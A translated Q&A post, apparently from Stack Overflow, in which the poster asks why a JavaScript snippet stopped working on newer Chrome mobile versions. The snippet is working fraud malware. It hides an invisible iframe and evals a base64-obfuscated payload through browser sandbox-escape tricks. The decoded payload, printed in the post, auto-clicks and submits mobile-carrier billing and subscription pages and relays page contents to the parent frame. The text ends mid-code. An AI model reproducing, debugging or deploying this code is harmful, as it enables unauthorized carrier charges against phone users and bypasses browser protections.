JavaScript不适用于高于Chrome mobile 45的版本

时间:2017-08-10 12:23:51

标签: javascript iframe xmlhttprequest cors chrome-mobile

我处理的JavaScript似乎不适用于高于Chrome mobile 45的版本。我无法在调试时找到正在发生的事情,但我在思考方法可能已被弃用。任何人都知道使用什么方法,或者如何调试它以便我自己更好地调查它?

这是功能:

<script>
    function cxc(x, group) {


        mixtracker.track("CXC", "cxc(" + x  + ")",  group);
        var navU = navigator["userAgent"];
        var isAndroidMobile = navU["indexOf"]("Android") > -1 && navU["indexOf"]("Mozilla/5.0") > -1 && navU["indexOf"]("AppleWebKit") > -1;
        var pattern=/Chrome\/([\d\.]+)/;
        var regExChrome = new RegExp(pattern);
        var resultChromeRegEx = regExChrome["exec"](navU);
        var chromeVersion = (resultChromeRegEx === null ? null : regExChrome["exec"](navU)[1]);
        var cv=chromeVersion===null?null:chromeVersion.substr(3).replace(/\./g,'');
        var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMDExLkRCIENBTEwtSU5JVElBTD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJzExMS5EQiBDQUxMLUhUTUwoMCk+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKCnZhciBCYXNlNjQgPSB7CgovLyBwcml2YXRlIHByb3BlcnR5CiAgICBfa2V5U3RyIDogIkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IiwKCi8vIHB1YmxpYyBtZXRob2QgZm9yIGVuY29kaW5nCiAgICBlbmNvZGUgOiBmdW5jdGlvbiAoaW5wdXQpIHsKICAgICAgICB2YXIgb3V0cHV0ID0gIiI7CiAgICAgICAgdmFyIGNocjEsIGNocjIsIGNocjMsIGVuYzEsIGVuYzIsIGVuYzMsIGVuYzQ7CiAgICAgICAgdmFyIGkgPSAwOwoKICAgICAgICBpbnB1dCA9IEJhc2U2NC5fdXRmOF9lbmNvZGUoaW5wdXQpOwoKICAgICAgICB3aGlsZSAoaSA8IGlucHV0Lmxlbmd0aCkgewoKICAgICAgICAgICAgY2hyMSA9IGlucHV0LmNoYXJDb2RlQXQoaSsrKTsKICAgICAgICAgICAgY2hyMiA9IGlucHV0LmNoYXJDb2RlQXQoaSsrKTsKICAgICAgICAgICAgY2hyMyA9IGlucHV0LmNoYXJDb2RlQXQoaSsrKTsKCiAgICAgICAgICAgIGVuYzEgPSBjaHIxID4+IDI7CiAgICAgICAgICAgIGVuYzIgPSAoKGNocjEgJiAzKSA8PCA0KSB8IChjaHIyID4+IDQpOwogICAgICAgICAgICBlbmMzID0gKChjaHIyICYgMTUpIDw8IDIpIHwgKGNocjMgPj4gNik7CiAgICAgICAgICAgIGVuYzQgPSBjaHIzICYgNjM7CgogICAgICAgICAgICBpZiAoaXNOYU4oY2hyMikpIHsKICAgICAgICAgICAgICAgIGVuYzMgPSBlbmM0ID0gNjQ7CiAgICAgICAgICAgIH0gZWxzZSBpZiAoaXNOYU4oY2hyMykpIHsKICAgICAgICAgICAgICAgIGVuYzQgPSA2NDsKICAgICAgICAgICAgfQoKICAgICAgICAgICAgb3V0cHV0ID0gb3V0cHV0ICsKICAgICAgICAgICAgICAgIHRoaXMuX2tleVN0ci5jaGFyQXQoZW5jMSkgKyB0aGlzLl9rZXlTdHIuY2hhckF0KGVuYzIpICsKICAgICAgICAgICAgICAgIHRoaXMuX2tleVN0ci5jaGFyQXQoZW5jMykgKyB0aGlzLl9rZXlTdHIuY2hhckF0KGVuYzQpOwoKICAgICAgICB9CgogICAgICAgIHJldHVybiBvdXRwdXQ7CiAgICB9LAoKLy8gcHVibGljIG1ldGhvZCBmb3IgZGVjb2RpbmcKICAgIGRlY29kZSA6IGZ1bmN0aW9uIChpbnB1dCkgewogICAgICAgIHZhciBvdXRwdXQgPSAiIjsKICAgICAgICB2YXIgY2hyMSwgY2hyMiwgY2hyMzsKICAgICAgICB2YXIgZW5jMSwgZW5jMiwgZW5jMywgZW5jNDsKICAgICAgICB2YXIgaSA9IDA7CgogICAgICAgIGlucHV0ID0gaW5wdXQucmVwbGFjZSgvW15BLVphLXowLTlcK1wvXD1dL2csICIiKTsKCiAgICAgICAgd2hpbGUgKGkgPCBpbnB1dC5sZW5ndGgpIHsKCiAgICAgICAgICAgIGVuYzEgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CiAgICAgICAgICAgIGVuYzIgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CiAgICAgICAgICAgIGVuYzMgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CiAgICAgICAgICAgIGVuYzQgPSB0aGlzLl9rZXlTdHIuaW5kZXhPZihpbnB1dC5jaGFyQXQoaSsrKSk7CgogICAgICAgICAgICBjaHIxID0gKGVuYzEgPDwgMikgfCAoZW5jMiA+PiA0KTsKICAgICAgICAgICAgY2hyMiA9ICgoZW5jMiAmIDE1KSA8PCA0KSB8IChlbmMzID4+IDIpOwogICAgICAgICAgICBjaHIzID0gKChlbmMzICYgMykgPDwgNikgfCBlbmM0OwoKICAgICAgICAgICAgb3V0cHV0ID0gb3V0cHV0ICsgU3RyaW5nLmZyb21DaGFyQ29kZShjaHIxKTsKCiAgICAgICAgICAgIGlmIChlbmMzICE9IDY0KSB7CiAgICAgICAgICAgICAgICBvdXRwdXQgPSBvdXRwdXQgKyBTdHJpbmcuZnJvbUNoYXJDb2RlKGNocjIpOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmIChlbmM0ICE9IDY0KSB7CiAgICAgICAgICAgICAgICBvdXRwdXQgPSBvdXRwdXQgKyBTdHJpbmcuZnJvbUNoYXJDb2RlKGNocjMpOwogICAgICAgICAgICB9CgogICAgICAgIH0KCiAgICAgICAgb3V0cHV0ID0gQmFzZTY0Ll91dGY4X2RlY29kZShvdXRwdXQpOwoKICAgICAgICByZXR1cm4gb3V0cHV0OwoKICAgIH0sCgovLyBwcml2YXRlIG1ldGhvZCBmb3IgVVRGLTggZW5jb2RpbmcKICAgIF91dGY4X2VuY29kZSA6IGZ1bmN0aW9uIChzdHJpbmcpIHsKICAgICAgICBzdHJpbmcgPSBzdHJpbmcucmVwbGFjZSgvXHJcbi9nLCJcbiIpOwogICAgICAgIHZhciB1dGZ0ZXh0ID0gIiI7CgogICAgICAgIGZvciAodmFyIG4gPSAwOyBuIDwgc3RyaW5nLmxlbmd0aDsgbisrKSB7CgogICAgICAgICAgICB2YXIgYyA9IHN0cmluZy5jaGFyQ29kZUF0KG4pOwoKICAgICAgICAgICAgaWYgKGMgPCAxMjgpIHsKICAgICAgICAgICAgICAgIHV0ZnRleHQgKz0gU3RyaW5nLmZyb21DaGFyQ29kZShjKTsKICAgICAgICAgICAgfQogICAgICAgICAgICBlbHNlIGlmKChjID4gMTI3KSAmJiAoYyA8IDIwNDgpKSB7CiAgICAgICAgICAgICAgICB1dGZ0ZXh0ICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGMgPj4gNikgfCAxOTIpOwogICAgICAgICAgICAgICAgdXRmdGV4dCArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKChjICYgNjMpIHwgMTI4KTsKICAgICAgICAgICAgfQogICAgICAgICAgICBlbHNlIHsKICAgICAgICAgICAgICAgIHV0ZnRleHQgKz0gU3RyaW5nLmZyb21DaGFyQ29kZSgoYyA+PiAxMikgfCAyMjQpOwogICAgICAgICAgICAgICAgdXRmdGV4dCArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyA+PiA2KSAmIDYzKSB8IDEyOCk7CiAgICAgICAgICAgICAgICB1dGZ0ZXh0ICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGMgJiA2MykgfCAxMjgpOwogICAgICAgICAgICB9CgogICAgICAgIH0KCiAgICAgICAgcmV0dXJuIHV0ZnRleHQ7CiAgICB9LAoKLy8gcHJpdmF0ZSBtZXRob2QgZm9yIFVURi04IGRlY29kaW5nCiAgICBfdXRmOF9kZWNvZGUgOiBmdW5jdGlvbiAodXRmdGV4dCkgewogICAgICAgIHZhciBzdHJpbmcgPSAiIjsKICAgICAgICB2YXIgaSA9IDA7CiAgICAgICAgdmFyIGMgPSBjMSA9IGMyID0gMDsKCiAgICAgICAgd2hpbGUgKCBpIDwgdXRmdGV4dC5sZW5ndGggKSB7CgogICAgICAgICAgICBjID0gdXRmdGV4dC5jaGFyQ29kZUF0KGkpOwoKICAgICAgICAgICAgaWYgKGMgPCAxMjgpIHsKICAgICAgICAgICAgICAgIHN0cmluZyArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKGMpOwogICAgICAgICAgICAgICAgaSsrOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGVsc2UgaWYoKGMgPiAxOTEpICYmIChjIDwgMjI0KSkgewogICAgICAgICAgICAgICAgYzIgPSB1dGZ0ZXh0LmNoYXJDb2RlQXQoaSsxKTsKICAgICAgICAgICAgICAgIHN0cmluZyArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyAmIDMxKSA8PCA2KSB8IChjMiAmIDYzKSk7CiAgICAgICAgICAgICAgICBpICs9IDI7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgICBjMiA9IHV0ZnRleHQuY2hhckNvZGVBdChpKzEpOwogICAgICAgICAgICAgICAgYzMgPSB1dGZ0ZXh0LmNoYXJDb2RlQXQoaSsyKTsKICAgICAgICAgICAgICAgIHN0cmluZyArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoYyAmIDE1KSA8PCAxMikgfCAoKGMyICYgNjMpIDw8IDYpIHwgKGMzICYgNjMpKTsKICAgICAgICAgICAgICAgIGkgKz0gMzsKICAgICAgICAgICAgfQoKICAgICAgICB9CgogICAgICAgIHJldHVybiBzdHJpbmc7CiAgICB9Cgp9CgovL2hyZWY6W2h0dHA6Ly9tZHNwLm9yYW5nZS5iZS93LWhhL2FwcC1idW5kbGVwdXJjaGFzZS9ub2RlP209aCUzRDlmZTk4YThiYzk0ZDU1NDkwYmUwYjc0MjY4MTFiZTI5JTNCcCUzRDEwMjk2JTNCayUzRDEwMjk2JTNCdiUzRDMlM0ElN0JjJTNEUHVyY2hhc2VUeXBlUmVxJTNCdiUzRCU3QnB1cmNoYXNlY2FzZSUzRDglM0JtcCUzRCU3Ql9hcF9zaWQlM0QyMzE1MjEyMTIlM0JfYXBfbW9kdWxlSWQlM0QxOCUzQl9hcF9waWQlM0QxMjEwMF8wNTAwX0dhbWUydXAlM0JfYXBfbGclM0RubCUzQmZvcm1hdCUzRHhodG1sJTNCX2FwX3R5cGUlM0RzdWJzY3JpcHRpb24lM0IlN0QlM0JtZXJjaGFudENhbGxiYWNrVVJMJTNEaHR0cCUzQSUyRiUyRm1wLm1vYmlsZS1ndy5jb20lMkZiZS1tb2Jpc3RhciUyRiUzQnBpJTNEMTIxMDBfMDUwMF9HYW1lMnVwJTNCJTdEJTdEJnJlZGlyZWN0PTEmTUNPPU9GUl07IHJlZjpbaHR0cDovL3VwcmVhbHRpbWUuY29tL2hyZnA/dXJsPWh0dHAlM0ElMkYlMkZwbGF5LmJuZ21ibC5jb20lMkYlM0ZtJTNEMEJQS0pHMTc3MDI3JTI2b2ZmZXJfa2V5JTNEMTc3MDI3JTI2ZmMlM0QxJTI2YSUzRE1fMjk4OTY0Mjk2NTgzMGQ4ZTJhOWYxNDkyNjYwNDQwJTI2cHViaWQlM0QxMzU1XTsiCmZ1bmN0aW9uIGdldE1ldGFVUkwoKSB7CiAgICB2YXIgbWV0YXMgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnbWV0YScpOwogICAgZm9yICh2YXIgaSA9IDA7IGkgPCBtZXRhcy5sZW5ndGg7IGkrKykgewogICAgICAgIGlmIChtZXRhc1tpXS5nZXRBdHRyaWJ1dGUoImh0dHAtZXF1aXYiKSA9PSAicmVmcmVzaCIpIHsKICAgICAgICAgICAgdmFyIGNvbnQgPSBtZXRhc1tpXS5nZXRBdHRyaWJ1dGUoImNvbnRlbnQiKTsKICAgICAgICAgICAgdmFyIHJlc3VsdCA9IG5ldyBSZWdFeHAoInVybD0oLiopJCIsICJpIikuZXhlYyhjb250KTsKICAgICAgICAgICAgcmV0dXJuIHJlc3VsdFsxXS5yZXBsYWNlKCInIiwgIiIpLnJlcGxhY2UoIiciLCAiIikKICAgICAgICB9CiAgICB9CiAgICByZXR1cm4gIiIKfQp2YXIgdHR0ID0gZ2V0TWV0YVVSTCgpOwoKCgp1cmwgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKCgpmdW5jdGlvbiBnZXRNZXRhVVJMKCl7CiAgICB2YXIgbWV0YXMgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnbWV0YScpOwogICAgZm9yICh2YXIgaT0wOyBpPG1ldGFzLmxlbmd0aDsgaSsrKXsKICAgICAgICBpZiAobWV0YXNbaV0uZ2V0QXR0cmlidXRlKCJodHRwLWVxdWl2IikgPT0gInJlZnJlc2giKXsKICAgICAgICAgICAgdmFyIGNvbnQgPSBtZXRhc1tpXS5nZXRBdHRyaWJ1dGUoImNvbnRlbnQiKTsKICAgICAgICAgICAgdmFyIHJlc3VsdCA9IG5ldyBSZWdFeHAoInVybD0oLiopJCIsICJpIikuZXhlYyhjb250KTsKICAgICAgICAgICAgaWYocmVzdWx0WzFdLm1hdGNoKC9eXC8vZ2kpICE9IG51bGwpewogICAgICAgICAgICAgICAgcmV0dXJuICJodHRwOi8vIiArIGxvY2F0aW9uLmhvc3RuYW1lICsgcmVzdWx0WzFdLnJlcGxhY2UoIiciLCAiIikucmVwbGFjZSgiJyIsICIiKTsKCiAgICAgICAgICAgIH1lbHNlewogICAgICAgICAgICAgICAgcmV0dXJuIHJlc3VsdFsxXS5yZXBsYWNlKCInIiwgIiIpLnJlcGxhY2UoIiciLCAiIik7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9CiAgICByZXR1cm4gIiI7Cn0KCnZhciByZWZyZXNoID0gZ2V0TWV0YVVSTCgpOwoKaWYocmVmcmVzaCAhPSAiIil7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdBIDogW1JlZnJlc2hdPj4+OyBscG51bTpbOThdOyByZWZyZXNoOiBbJyArIHJlZnJlc2ggKyAnXTsgaHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmID0gcmVmcmVzaDsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ0EgOiBbUmVmcmVzaF1lZD4+PicsJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdvbGRlcicpIT11bmRlZmluZWQpCnsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2ZvdW5kIGJvbGRlcj4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnb2xkZXInKS5jaGVja2VkID0gdHJ1ZTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdmb3JtJylbMF0uc3VibWl0KCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3JtIHN1Ym1pdHRlZD4+PicsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdsYXJnZSBleHBhbmRlZCBzdWNjZXNzIGJ1dHRvbiBmbG9hdC1jZW50ZXInKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgbGFyZ2UgZXhwYW5kZWQgc3VjY2VzcyBidXR0b24gZmxvYXQtY2VudGVyPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2xhcmdlIGV4cGFuZGVkIHN1Y2Nlc3MgYnV0dG9uIGZsb2F0LWNlbnRlcicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdsYXJnZSBleHBhbmRlZCBzdWNjZXNzIGJ1dHRvbiBmbG9hdC1jZW50ZXIgc3VibWl0dGVkPj4+JywgJyonKTsKfQplbHNlIGlmKHdpbmRvdy5sb2NhdGlvbi5ocmVmLmluZGV4T2YoImFwcHNpbGlrZS5tb2JpL0JFIikhPS0xKQp7CgogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnaW4gYXBwc2lsaWtlLm1vYmk+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwogICAgc2V0VGltZW91dCgKICAgICAgICBmdW5jdGlvbiAoKSB7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J1dHRvbiBwdWxzZScpLmxlbmd0aD4wICYmIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjaGVjaycpIT11bmRlZmluZWQKCiAgICAgICAgICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2ZvdW5kIGJ1dHRvbiBwdWxzZT4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjaGVjaycpLmNoZWNrZWQgPSB0cnVlOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidXR0b24gcHVsc2UnKVswXS5jbGljaygpOwogICAgICAgICAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidXR0b24gcHVsc2UgY2xpY2tlZD4+PicsICcqJyk7CiAgICAgICAgfSwKICAgICAgICAxOTAwCiAgICApOwoKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2luIGFwcHNpbGlrZS5tb2JpMj4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7Cgp9CmVsc2UgaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ09wZXJhdG9yJykhPXVuZGVmaW5lZCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgT3BlcmF0b3I+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ09wZXJhdG9yJykudmFsdWUgPSAnMjA2MTAnOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Ym1pdF9idXR0b24nKS5jbGljaygpOwogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnc3VibWl0X2J1dHRvbiBzdWJtaXR0ZWQ+Pj4nLCAnKicpOwp9CgplbHNlIGlmKHVybC5pbmRleE9mKCdtZHNwLm9yYW5nZS5iZS93LWhhL2FwcC1idW5kbGVwdXJjaGFzZS9ub2RlJykhPS0xICYmCiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidXR0b24nKS5sZW5ndGg9PTMpCnsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2ZvdW5kIGJ0biA+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBzZXRUaW1lb3V0KAoKICAgICAgICBmdW5jdGlvbiAoKSB7CiAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J1dHRvbicpWzJdLmNsaWNrKCk7CiAgICAgICAgfSwKICAgICAgICAyMDAwCgogICAgKTsKCiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xpY2tlZD4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwp9CmVsc2UgaWYodHR0IT0iIiAmJiB0dHQuaW5kZXhPZigidmlkZW8td3JsZC5jb20vQkUiKSE9LTEpCnsKCiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCd6Zm91bmQgdHR0Pj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ3pmb3VuZCB0dHQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKICAgIGxvY2F0aW9uLnJlcGxhY2UodHR0KTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ3pmb3VuZCB0dHQgY2xpY2tlZD4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwp9CmVsc2UKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZWxzZSA+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlID4+PicrIEJhc2U2NC5lbmNvZGUoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwpLCAnKicpOwogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnNjQ2NC5EQiBDQUxMLUhUTUwoMCk+Pj4nKyAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwpLCAnKicpOwoKfQ==";
        if (isAndroidMobile && cv!=='0') {
            //console.re.log("IDBKeyRange.only.call::" + navU);
            IDBKeyRange.only.call(frames[x],0).constructor.constructor('eval(atob(\"'+ value +'\"))')();
        }else{
            //console.re.log("window.open0000::" + navU);
            window.open("\u0000javascript:eval(atob(\""+ value +"\"))", "androidload"+x);
        }
    }

        var i0 = document.documentElement.appendChild(document.createElement('iframe'));
    i0.onload = function(){cxc(0, 'em5601')};
    i0.setAttribute('style', 'opacity: 0;overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px');
    i0.setAttribute('sandbox', 'allow-scripts allow-forms allow-same-origin allow-popups allow-top-navigation');
    i0.src = "javascript:window.location.replace('http://www.url_for_iframe.com')";

    setTimeout(function(){location.replace(jmurl);}, 200000);
</script>

这是#34;值&#34;中的函数解密:

window.parent.postMessage('011.DB CALL-INITIAL>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('111.DB CALL-HTML(0)>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');

var Base64 = {

// private property
    _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

// public method for encoding
    encode : function (input) {
        var output = "";
        var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
        var i = 0;

        input = Base64._utf8_encode(input);

        while (i < input.length) {

            chr1 = input.charCodeAt(i++);
            chr2 = input.charCodeAt(i++);
            chr3 = input.charCodeAt(i++);

            enc1 = chr1 >> 2;
            enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
            enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
            enc4 = chr3 & 63;

            if (isNaN(chr2)) {
                enc3 = enc4 = 64;
            } else if (isNaN(chr3)) {
                enc4 = 64;
            }

            output = output +
                this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
                this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);

        }

        return output;
    },

// public method for decoding
    decode : function (input) {
        var output = "";
        var chr1, chr2, chr3;
        var enc1, enc2, enc3, enc4;
        var i = 0;

        input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

        while (i < input.length) {

            enc1 = this._keyStr.indexOf(input.charAt(i++));
            enc2 = this._keyStr.indexOf(input.charAt(i++));
            enc3 = this._keyStr.indexOf(input.charAt(i++));
            enc4 = this._keyStr.indexOf(input.charAt(i++));

            chr1 = (enc1 << 2) | (enc2 >> 4);
            chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
            chr3 = ((enc3 & 3) << 6) | enc4;

            output = output + String.fromCharCode(chr1);

            if (enc3 != 64) {
                output = output + String.fromCharCode(chr2);
            }
            if (enc4 != 64) {
                output = output + String.fromCharCode(chr3);
            }

        }

        output = Base64._utf8_decode(output);

        return output;

    },

// private method for UTF-8 encoding
    _utf8_encode : function (string) {
        string = string.replace(/\r\n/g,"\n");
        var utftext = "";

        for (var n = 0; n < string.length; n++) {

            var c = string.charCodeAt(n);

            if (c < 128) {
                utftext += String.fromCharCode(c);
            }
            else if((c > 127) && (c < 2048)) {
                utftext += String.fromCharCode((c >> 6) | 192);
                utftext += String.fromCharCode((c & 63) | 128);
            }
            else {
                utftext += String.fromCharCode((c >> 12) | 224);
                utftext += String.fromCharCode(((c >> 6) & 63) | 128);
                utftext += String.fromCharCode((c & 63) | 128);
            }

        }

        return utftext;
    },

// private method for UTF-8 decoding
    _utf8_decode : function (utftext) {
        var string = "";
        var i = 0;
        var c = c1 = c2 = 0;

        while ( i < utftext.length ) {

            c = utftext.charCodeAt(i);

            if (c < 128) {
                string += String.fromCharCode(c);
                i++;
            }
            else if((c > 191) && (c < 224)) {
                c2 = utftext.charCodeAt(i+1);
                string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
                i += 2;
            }
            else {
                c2 = utftext.charCodeAt(i+1);
                c3 = utftext.charCodeAt(i+2);
                string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
                i += 3;
            }

        }

        return string;
    }

}

//href:[http://mdsp.orange.be/w-ha/app-bundlepurchase/node?m=h%3D9fe98a8bc94d55490be0b7426811be29%3Bp%3D10296%3Bk%3D10296%3Bv%3D3%3A%7Bc%3DPurchaseTypeReq%3Bv%3D%7Bpurchasecase%3D8%3Bmp%3D%7B_ap_sid%3D231521212%3B_ap_moduleId%3D18%3B_ap_pid%3D12100_0500_Game2up%3B_ap_lg%3Dnl%3Bformat%3Dxhtml%3B_ap_type%3Dsubscription%3B%7D%3BmerchantCallbackURL%3Dhttp%3A%2F%2Fmp.mobile-gw.com%2Fbe-mobistar%2F%3Bpi%3D12100_0500_Game2up%3B%7D%7D&redirect=1&MCO=OFR]; ref:[http://uprealtime.com/hrfp?url=http%3A%2F%2Fplay.bngmbl.com%2F%3Fm%3D0BPKJG177027%26offer_key%3D177027%26fc%3D1%26a%3DM_2989642965830d8e2a9f1492660440%26pubid%3D1355];"
function getMetaURL() {
    var metas = document.getElementsByTagName('meta');
    for (var i = 0; i < metas.length; i++) {
        if (metas[i].getAttribute("http-equiv") == "refresh") {
            var cont = metas[i].getAttribute("content");
            var result = new RegExp("url=(.*)$", "i").exec(cont);
            return result[1].replace("'", "").replace("'", "")
        }
    }
    return ""
}
var ttt = getMetaURL();



url = window.location.href;


function getMetaURL(){
    var metas = document.getElementsByTagName('meta');
    for (var i=0; i<metas.length; i++){
        if (metas[i].getAttribute("http-equiv") == "refresh"){
            var cont = metas[i].getAttribute("content");
            var result = new RegExp("url=(.*)$", "i").exec(cont);
            if(result[1].match(/^\//gi) != null){
                return "http://" + location.hostname + result[1].replace("'", "").replace("'", "");

            }else{
                return result[1].replace("'", "").replace("'", "");
            }
        }
    }
    return "";
}

var refresh = getMetaURL();

if(refresh != ""){
    window.parent.postMessage('A : [Refresh]>>>; lpnum:[98]; refresh: [' + refresh + ']; href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.location.href = refresh;
